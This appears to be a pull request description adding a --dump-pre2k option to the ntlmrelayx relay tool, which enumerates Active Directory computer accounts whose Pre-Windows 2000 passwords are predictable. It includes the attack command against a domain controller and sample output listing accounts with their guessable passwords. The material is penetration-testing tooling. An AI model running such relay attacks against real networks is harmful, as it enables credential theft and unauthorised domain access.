ntlmrelayx: Add --dump-pre2k to enumerate Pre-Windows 2000 vulnerable computers

[H4ckT0Th3Futur3]

Summary

• Add a new --dump-pre2k option to ntlmrelayx LDAP relay attacks
• Enumerates computer accounts potentially vulnerable to Pre-Windows 2000 authentication, where the password is predictable (lowercase machine name without the trailing $)
• Detection based on PASSWD_NOTREQD flag (0x0020) in userAccountControl and accounts with pwdLastSet=0
• Results are displayed in the console and saved as JSON in the lootdir

Usage

ntlmrelayx.py -t ldap://DC_IP --dump-pre2k

Output example

[*] Enumerating computer accounts potentially vulnerable to Pre-Windows 2000 authentication
[*] Found 2 potentially vulnerable Pre-Windows 2000 computer account(s):
[*]   OLDPC01$                        Password: oldpc01                   OS: Windows Server 2012 R2
[*]   YOURPC$                         Password: yourpc                    OS: N/A
[*] Pre-Windows 2000 results saved to /tmp/loot/pre2k-dump-admin-12345.json

Test plan

• Test with LDAP relay to a domain controller containing known pre-2k computer accounts
• Verify JSON output file is correctly written to lootdir
• Verify no false positives on standard computer accounts
• Test with both LDAP and LDAPS targets